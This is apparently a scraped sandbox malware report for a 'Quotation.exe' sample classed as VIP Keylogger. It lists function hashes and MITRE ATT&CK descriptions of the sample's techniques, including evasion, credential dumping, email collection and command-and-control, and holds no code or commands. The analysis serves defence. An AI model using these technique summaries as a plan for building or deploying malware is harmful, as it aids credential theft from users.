Opcode Fuzzy Hash: 0e2c3d717a6dbfca9c6f2def378259797a79e8ec0cf37e241367d780f0e5e902
Instruction Fuzzy Hash: 62C1E4B2901B468AE712CF65EE4C38D7BB1BB89324B50460BD2612F2F4DBB5154ACF84

Function 00C2F52F Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35158bc26a98f74a58c5212d0db15268853d479436d5678e3abef1a09fe3c3d6
Instruction ID: 155f4f06f6ce9702a1130590f12ab3c2d941815c1587dca5b4b077b96ca55014
Opcode Fuzzy Hash: 35158bc26a98f74a58c5212d0db15268853d479436d5678e3abef1a09fe3c3d6
Instruction Fuzzy Hash: 9E511470D04228CFDB15EFA8E4847AEBBB1FB49301F248139E415ABA95C7759C82CF54

Function 00C2F4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd12f41f142a05841c45e5b0e20dd8187745e6c31430de29e94ee6843dd8decf
Instruction ID: 46938f790d48be557f0c287cf7c5882bfce5282e1ef8630fbcb87deaa5bff4db
Opcode Fuzzy Hash: dd12f41f142a05841c45e5b0e20dd8187745e6c31430de29e94ee6843dd8decf
Instruction Fuzzy Hash: 6751E270D04228CFDB14EFA8E484BAEBBB1FB49301F208139E415BBA95C7759982DF54

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Quotation.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
Quotation.exe

Function 005E4AF8 Relevance: 1.7, APIs: 1, Instructions: 203
COMMON

Function 005E509C Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Function 005E51EC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 005EBC91 Relevance: 1.6, APIs: 1, Instructions: 78
comCOMMON

Function 005EBBF1 Relevance: 1.6, APIs: 1, Instructions: 55
comCOMMON

Function 005E4CF8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Function 005EADF8 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Function 00C28490 Relevance: .7, Instructions: 703
COMMON

Function 00C2E007 Relevance: .7, Instructions: 654
COMMON

Function 00C2E018 Relevance: .6, Instructions: 647
COMMON

Function 00C20C8F Relevance: .5, Instructions: 549
COMMON

Function 00C20CA0 Relevance: .5, Instructions: 539
COMMON